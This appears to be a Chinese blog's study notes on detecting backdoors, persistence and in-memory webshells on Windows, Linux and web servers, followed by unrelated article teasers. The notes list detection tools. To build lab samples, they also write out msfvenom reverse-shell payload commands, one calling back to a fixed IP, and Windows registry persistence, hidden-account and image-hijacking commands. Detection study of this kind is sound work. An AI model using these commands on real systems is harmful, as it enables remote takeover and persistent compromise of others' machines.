后门攻击检测指南--windowsLinuxweb

news2024/12/27 2:57:20

免责声明:本文仅做技术交流与学习...

目录

Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

关于Rootkit的检测:

web层面-后门--内存马


Win d o w s - 后 门 - 常 规 & 权 限 维 持& 内 存 马

火绒剑--系统--开始监控 	等等 --分析进程,数字签名,对外连接,IP,	文件上传分析
火绒剑-->(自)启动项 --找找找
		隐藏用户
映像劫持	--PCHunter1.56工具

屏保&登录	--火绒剑-启动项

... 

Windows 实验 
1、常规 MSF 后门-分析检测 
2、权限维持后门-分析检测 
3、Web 程序内存马-分析检测 

常见工具集合: 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 

常规后门: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx 
lport=6666 -f exe -o shell.exe 

自启动测试: (注册表添加自启动项目)
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V 
"backdoor" /t REG_SZ /F /D "C:\shell.exe" 

隐藏账户: 
net user xiaodi$ xiaodi!@#X123 /add 

映像劫持 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d 
"C:\Windows\System32\cmd.exe /c calc" 


屏保&登录 
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE 
/t REG_SZ /d "C:\shell.exe" /f 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D 
"C:\shell.exe" 
=============================================================================================== 

Lin u x - 后 门 - 常 规 & 权 限 维 持 & R o o t kit& 内 存 马

Linux:
msf生成elf

netstat -anpt
kill 进程号
rm 文件


rookit后门:
流量抓不到--足够隐藏
后门权限非常高	(驱动)

	
工具箱:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 	
rookit检测


Linux 实验 
1、常规 MSF 后门-分析检测 
2、Rootkit 后门-分析检测 
3、权限维持后门-分析检测 
4、Web 程序内存马-分析检测 
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg 

常规后门: 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf 
Rootkit 后门:GScan rkhunter 

权限维持后门:GScan rkhunter 
1、GScan 
https://github.com/grayddq/GScan 
python GScan.py 
2、rkhunter 
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz
cd rkhunter-1.4.6
./installer.sh   	--layout		default		--install
rkhunter -c
(集成了多个特征而已)
--检测不到啊
.
.
.

rookit  内存马  6666666666666666666

EDR?青藤?


关于Rootkit的检测:

linux平台下:chkrootkit、rkhunter、OSSEC、zeppoo等
Windows平台下:BlackLight、RootkitRevealer、Rootkit Hook Analyzer 

Gscan:GitHub - grayddq/GScan: 本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。


web层面-后门--内存马

Web层面:
通用系统层面
1、常规后门
2、内存马(无文件马)
PHP	php内存马  ---146	--重启服务--再删
.NET
JAVA
Python

java内存马:
哥斯拉注入	--有不同类型
冰蝎		--

河马,,,,等等检测	--发现	有的需要dump下载下来分析		kill
(工具脚本一些不支持,中间件,语言等等)

--------------------------
手工分析:
一些不支持,就手工分析,调试
cop.jar
arthas-boot.jar		--能看到实时的内存变化



.NET: https://github.com/yzddmr6/ASP.NET-Memshell-Scanner		
asp.NET脚本 特定检测.删除	--(ASP.NET-Memshell-Scanner-master)
jsp: 	hmws工具检测(不行就运行2次试试)河马有问题...
PHP: 常规后门查杀检测后,中间件重启后删除文件即可
JAVA:河马版本,其他优秀项目
java-memshell-scanner-master工具检测tomcat.		--支持tomcat所有

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1908596.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

构建LangChain应用程序的示例代码:58、如何使用 Nomic 的新嵌入模型构建和部署一个检索增强生成(RAG)应用

Nomic 嵌入模型 Nomic 发布了一个新的嵌入模型,在长上下文检索方面表现出色(8k上下文窗口)。 本教程将介绍使用 Nomic 嵌入构建和部署(通过 LangServe)RAG 应用的过程。 注册 获取您的 API 令牌,然后运行: ! nomic login然后使用您生成的 API 令牌运行 ! nomic login <…

vue-使用Worker实现多标签页共享一个WebSocket

文章目录 前言一、SharedWorker 是什么SharedWorker 是什么SharedWorker 的使用方式SharedWorker 标识与独占 二、Demo使用三、使用SharedWorker实现WebSocket共享 前言 最近有一个需求&#xff0c;需要实现用户系统消息时时提醒功能。第一时间就是想用WebSocket进行长连接。但…

WordPress开发进群V2主题源码,多种引流方法,引私域二次变现

WordPress开发进群V2主题源码&#xff0c;多种引流方法&#xff0c;引私域二次变现 全新前端UI界面&#xff0c;多种前端交互特效让页面不再单调&#xff0c;进群页面群成员数&#xff0c;群成员头像名称&#xff0c;每次刷新页面随机更新不重复&#xff0c;最下面评论和点赞也…

产品经理-交互设计动手实践(11)

业内有很多画交互的工具&#xff0c;这里不过多介绍&#xff0c;互联网公司最常用的工具是Axure,墨刀,蓝湖,小瀑 它是一个专业的快速原型设计工具&#xff0c;使用它能够快速创建线框图、流程图、原型和规格说明文档。 它能快速、高效地创建原型&#xff0c;同时支持多人协作设…

Java进阶----继承

继承 一.继承概述 继承是可以通过定义新的类&#xff0c;在已有类的基础上扩展属性和功能的一种技术. 案例&#xff1a;优化 猫、狗JavaBean类的设计 狗类&#xff1a;Dog 属性&#xff1a;名字 name&#xff0c;年龄 age 方法&#xff1a;看家 watchHome()&#xff0c;Gett…

机器学习统计学基础 - 最大似然估计

最大似然估计&#xff08;Maximum Likelihood Estimation, MLE&#xff09;是一种常用的参数估计方法&#xff0c;其基本原理是通过最大化观测数据出现的概率来寻找最优的参数估计值。具体来说&#xff0c;最大似然估计的核心思想是利用已知的样本结果&#xff0c;反推最有可能…

自定义类TMyLabel继承自QLabel ,实现mouseDoubleClickEvent

自定义类TMyLabel &#xff0c;继承自QLabel TMyLabel 中重新实现了 event 方法&#xff0c;重写了mouseDoubleClickEvent 发射信号 在主窗体中放入TMyLabel组件&#xff0c;将TMyLabel mouseDoubleClickEvent 信号&#xff0c; 绑定到实现方法do_doubleClick()槽函数 TMy…

知识付费系统3.0整站源码知识付费网课平台网创资源付费带自动采集同步插件

程序说明&#xff1a; 1.修复更新到最新版本 2.自动采集插件重写 3.关闭采集授权域名直接对接 4.更新插件主动请求同步资源 5.带自动采集插件 原始功能 支持分类替换 将主站同步过来的文章分类进行替换 支持自定义文章作者&#xff08;选择多个作者则同步到的文章作者将会随机分…

已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!

已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法&#xff0c;亲测有效&#xff01;&#xff01;&#xff01; 目录 一、问题分析 二、报错原因 三、解决思路 四、解决方法 五、总结 博主v&#xff1a;XiaoMing_Java 博主v&#x…

Desktop docker 部署 WordPress

Desktop Docker 部署 WordPress 之前都是在Linux里面玩的&#xff0c;今天看到别人在windwos下安装docker&#xff0c;一时兴起装了一个试试&#xff0c;效果一般&#xff0c;很吃硬盘空间和内存。 首先在docker官方下载桌面版&#xff0c;安装下一步一直到完成。 安装完docke…

C++初阶:从C过渡到C++的入门基础

✨✨所属专栏&#xff1a;C✨✨ ✨✨作者主页&#xff1a;嶔某✨✨ C发展历史 C的起源可以追溯到1979年&#xff0c;当时BjarneStroustrup(本贾尼斯特劳斯特卢普&#xff0c;这个翻译的名字不同的地⽅可能有差异)在⻉尔实验室从事计算机科学和软件⼯程的研究⼯作。⾯对项⽬中复…

ubantu安装k8s集群服务

进行主机优化配置 参考&#xff1a; 修改主机名称 hostnamectl set-hostname k8s-node03 关闭swap分区 swapoff -a #临时关闭 sed -i /\/swap/s/^/# /etc/fstab #永久关闭 增加主机解析 cat >> /etc/hosts << EOF 10.1.60.119 k8s-master01 10.1.60.12…

ArcGIS:探索地理信息系统的强大功能与实际应用

ArcGIS是一款功能强大的地理信息系统&#xff08;GIS&#xff09;软件&#xff0c;由Esri公司开发。它广泛应用于各个领域&#xff0c;包括城市规划、环境保护、资源管理、交通运输等。作为一名长期使用ArcGIS的用户&#xff0c;我深感这款软件在数据分析、地图制作和空间信息管…

ROS编译错误: fatal error: test_pkg/test_pkg.h: 没有那个文件

在ROS安装完毕后编译ros工作空间&#xff0c;出现了以下错误: 解决方法: 删除工作空间&#xff0c;重建再重新编译

Android EditText+ListPopupWindow实现可编辑的下拉列表

Android EditTextListPopupWindow实现可编辑的下拉列表 &#x1f4d6;1. 可编辑的下拉列表✅步骤一&#xff1a;准备视图✅步骤二&#xff1a;封装显示方法✅步骤三&#xff1a;获取视图并监听 &#x1f4d6;2. 扩展上下箭头✅步骤一&#xff1a;准备上下箭头icon图标✅步骤二&…

基于stm32开发的红外循迹小车

本项目算是接触32来开发的第一个小项目了&#xff0c;虽然前期用51写过一个循迹小车&#xff0c;以为直接转到32会比较简单&#xff0c;结果还是花了大几天才把小车的参数完全调完&#xff0c;以此来记录下自己的学习历程&#xff08;注&#xff1a;循迹算法并未加入PID算法&am…

PDA:Prompt-based Distribution Alignment for Unsupervised Domain Adaptation

文章汇总 式中&#xff0c; y s y^s ys表示源域数据的one-hot ground-truth&#xff0c; K K K为类数&#xff0c; w i w_i wi​和 z ~ s \tilde{z}_s z~s​分别表示源域经过提示调优的最终文本表示和最终图像表示的第 i i i类。 同理&#xff0c;为了进一步利用目标领域的数据…

多用户挂售转卖竞拍闪拍商城系统/NFT数藏系统/后端PHP+前端UNIAPP源码带教程(亲测源码)

挂售转卖竞拍商城系统源码/竞拍系统/转拍闪拍系统/后端PHP前端UNiapp源码 亲测可用 1、后台管理&#xff1a;系统管理员通过后台可以轻松添加商品进行挂单。这包括商品的详细信息&#xff0c;如名称、描述、价格、库存等。 商品展示&#xff1a;挂单后的商品会在商城前端进行…

Mysql笔记-v2【7月8日更新】

零、 help、\h、? 调出帮助 mysql> \hFor information about MySQL products and services, visit:http://www.mysql.com/ For developer information, including the MySQL Reference Manual, visit:http://dev.mysql.com/ To buy MySQL Enterprise support, training, …

概论(二)随机变量

1.名词解释 1.1 样本空间 一次具体实验中所有可能出现的结果&#xff0c;构成一个样本空间。 1.2 随机变量 把结果抽象成数值&#xff0c;结果和数值的对应关系就形成了随机变量X。例如把抛一次硬币的结果&#xff0c;正面记为1&#xff0c;反面记为0。有变量相对应的就有自…